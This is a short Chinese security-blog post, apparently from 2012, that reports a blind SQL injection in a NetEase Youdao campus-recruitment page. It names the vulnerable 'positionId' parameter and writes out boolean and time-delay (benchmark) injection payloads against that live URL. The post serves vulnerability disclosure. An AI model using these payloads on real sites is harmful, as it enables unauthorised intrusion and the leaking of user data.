当前位置: iick's blog > 网站漏洞 > 网易有道某分站盲注

网易有道某分站盲注

作者:hack1990 时间:12-11-14 阅读数:611人阅读

网易有道某分站盲注,导致用户信息泄漏


地址:http://campus.youdao.com/campus/job_list.php?t1=campus&positionId=1
 
有漏洞的参数是positionId,用and语句判断存在SQL注入。
 
http://campus.youdao.com/campus/job_list.php?t1=campus&positionId=1 and 1=1 返回正确


http://campus.youdao.com/campus/job_list.php?t1=campus&positionId=1 and 1=2 返回错误
 

 

然后用benchmark函数判断存在盲注,明显有延时。
 
http://campus.youdao.com/campus/job_list.php?t1=campus&positionId=1 and if(1,benchmark(500000,md5(1)),1)
 

 

# Nmap Security Scanner 7.0

上一篇:中国移动 成都580万手机号数据库泄漏

下一篇:腾讯短信炸弹 无限制条数短信发送

相关文章

发表评论